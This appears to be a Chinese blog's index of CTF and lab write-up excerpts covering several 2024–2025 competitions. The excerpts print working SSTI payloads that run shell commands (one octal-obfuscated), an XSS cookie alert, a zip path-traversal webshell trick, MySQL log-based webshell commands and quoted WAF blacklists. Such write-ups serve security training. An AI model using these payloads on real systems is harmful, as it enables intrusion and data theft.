25西湖
2025西湖冬季文章所有参考将在文末给出 webweb1ssti 太简单的不赘述,知道用就行 1{{cycler.__init__.__globals__.__builtins__['__import__']('os').popen('$(printf "\150\145\141\144\40\57\146\154\141\52")').read()}} 赘述 1个admin");alert(document.cookie);("能弹出admin web2先是弱口令爆破 12密码year2000用户admin 上传的php文件会被删除,条件竞争 普通脚本12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667import ioimport...
25suctf
Suctf2025–2标识为看的wp,没环境复现了 所有参考资料将在文本末尾标明 WEBSU_photogallery思路👇 构造一个压缩包,解压出我们想解压的部分,然后其他部分是损坏的,这样是不是就可以让整个解压过程是出错的从而进入到if里,我们的shell就这样留下了 先是php版本的漏洞 再根据源码漏洞上码 三种写码方法如下👇 法一12345678910111213<?php$zip = new ZipArchive();$zipFilePath = 'exp.zip';if ($zip->open($zipFilePath, ZipArchive::CREATE | ZipArchive::OVERWRITE) === TRUE) { $zip->addFile('1.php', "..\./..\./a.jpg"); $zip->close(); echo "ok";}?> 配上 12345GET...
25春秋杯
春秋杯文章所有内容部分来自自己写的,部分来自各路非公开wp,部分来自公开wp(附上链接,在文章末尾) easy_flask1{{().__class__.__mro__.__getitem__(1).__subclasses__()[133].__init__.__globals__['popen']('cat+flag').read()}} 1{{[].__class__.__base__.__subclasses__()[394]('cat /app/flag',shell=True,stdout=-1).communicate()[0].strip()}} copy1https://github.com/synacktiv/php_filter_chains_oracle_exploit?tab=readme-ov-file 1python3 filters_chain_oracle_exploit.py --target ...
2025元旦渗透赛复现-ctfshow
2025ctfshow元旦渗透赛第一章flag1-压缩包压缩包密码爆破 flag2-图片-密码压缩包里面有个图片 PNG 文件的尾部标识符 49 45 4E 44 AE 42 60 82 提取出后边多余的文件base64解密👇出来个这个 1234567if __name__ == '__main__': try: import secretMessageResponse except ImportError: import pip pip.main(['install', 'secretMessageResponse']) from secretMessageResponse import printMessage 拿python运行一下没出来一堆数据 去找库👇 pip show secretMessageResponse crypto环境问题from Crypto.PublicKey import RSA...
2024第一场ciscn-ctfshow复现
2024ciscn第一场本章内容均在ctfshow复现 sanicpython污染 源码123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354from sanic import Sanicfrom sanic.response import text, htmlfrom sanic_session import Sessionimport pydash# pydash==5.1.2class Pollute: def __init__(self): passapp = Sanic(__name__)app.static("/static/", "./static/")Session(app)@app.route('/', methods=['GET', 'POST'])async def index(request):...
红日靶场12457
+红日靶场1配置说明:虚拟机所有初始密码都为hongrisec@2019(后面需要改密码,自己设置) 12我修改为 win7 要把打印机协议打开 1234本地--域192.168.52.143本地5192.168.57.3 win2008 12本地192.168.52.138 win2k3 1192.168.236.141 在win7的phpstudy打开服务,打不开就重启一次 本地可以访问,其他用户无法访问 1https://blog.csdn.net/liuhhaiffeng/article/details/72137102 开打1nmap -sV 192.168.57.3 漏洞点一rogue_mysql任意文件读取,但是得盲猜,还要当前用户有权限 二 数据库弱口令日志写码1234查看日志状态: show variables like '%general%'; 开启general_log为True: SET GLOBAL general_log='on'; 执行命令指定日志写马: SET GLOBAL...
24强网杯
24强网PyBlockly题目源码123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158from flask import Flask, request, jsonifyimport reimport unidecodeimport stringimport astimport sysimport...
第二届CN-fnst::CTF
CN-fnst::CTFweb1ez_python盲猜是文件包含file题目是python,读取源码;看到shell路由有个ssti 再看看waf /?file=/app/waf.py 123456def waf_check(value): dangerous_patterns = ['os', 'set', '__builtins__', '=', '.', '{{', '}}', 'popen', '+', '__'] for pattern in dangerous_patterns: if pattern in value: return False return...
第二届长城杯/铁三
第二届国赛webSafe_Proxy源码题目 1from flask import Flask, request, render_template_stringimport socketimport threadingimport htmlapp = Flask(__name__)@app.route('/', methods="GET"])def source(): with open(__file__, 'r', encoding='utf-8') as f: return'<pre>'+html.escape(f.read())+'</pre>'@app.route('/', methods=["POST"])def template(): template_code = request.form.get("code") # 安全过滤 ...
24国城杯
2024国城杯1Easy Jellyjava欠着 2Ez_Gallery 账号admin;密码123456;直接爆也行,验证码可以重复用 存在文件包含,不知道flag在哪 info?file=/proc/self/cmdline发现题目app.py;然后去读取题目源码 源码的shell路由是个ssti攻击点 黑名单 12345678blacklist_patterns = [r'.*length.*',r'.*count.*',r'.*[0-9].*',r'.*\..*',r'.*soft.*']if any(re.search(pattern, expression) for pattern in blacklist_patterns):return Response('wafwafwaf')try:result...